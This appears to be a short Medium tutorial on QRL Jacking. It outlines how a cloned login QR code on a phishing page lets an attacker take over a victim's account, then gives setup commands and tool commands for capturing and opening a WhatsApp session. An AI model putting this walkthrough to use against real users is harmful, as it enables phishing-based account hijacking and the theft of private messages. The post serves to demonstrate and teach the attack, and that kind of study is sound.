QRL Jacking

Overview
  1. The attacker initializes a client-side QR session and clones the Login QR Code into a phishing website “Now a well-crafted phishing page with a valid and regularly updated QR Code is ready to be sent to a Victim.”
  2. The Attacker Sends the phishing page to the victim. (a lot of efficient attack vectors are going to be clarified later in the paper)
  3. The Victim Scans the QR Code with a Specific Targeted Mobile App.
  4. The Attacker gains control over the victim’s Account.
  5. The service is exchanging all the victim’s data with the attacker’s session.

Installation Process:

  • Linux or MAC OS
  • Python 3.7+
  • Firefox Web Browser
you can also download the zip and extract it.
  • wget https://github.com/mozilla/geckodriver/releases/download/v0. 29.1/geckodriver-v0.29.1-linux64.tar.gz
  • tar -zxvf geckodriver-v0.29.1-linux64.tar.gz
  • chmod +x geckodriver
  • sudo mv -f geckodriver /usr/local/share/geckodriver
  • sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
  • sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
the banner may vary from time to time ;)
  • use grabber/whatsapp
  • set port 2001
  • set host 127.0.0.1
  • http://127.0.0.1:2001
QR code that has to be scanned in WhatsApp App
session has been saved successfully
  • sessions
  • sessions -i 0
My whatsapp

I also recorded this part but the gecko installation part isn’t available in that recording G drive URL

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Phishing attacks on Pancake Swap and Cream Finance

🐾 Say hello to ASS 🐾

{UPDATE} Gems Hunter Pinball Hack Free Resources Generator

CertHum Announces New Weekly Giveaways, 2000 GLMR Giveaways Winner

How Verrit’s “Authentication Codes” Expose Peter Daou’s Continuing Ineptitude

{UPDATE} Party Mafia Hack Free Resources Generator

How to approach your Business Intelligence project

How to 🌯Wrap a .bit Domain on Ethereum

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Sumanth Dodda

Sumanth Dodda

More from Medium

I AM LOVE Series Launch

Watercolor Essence Portraits using the love language of Words of Affirmation

Neanderthal Messiah — 186

The Transhuman Present — A Future Dystopia?

The 10 Laws of Kenpo From The Hacker Perspective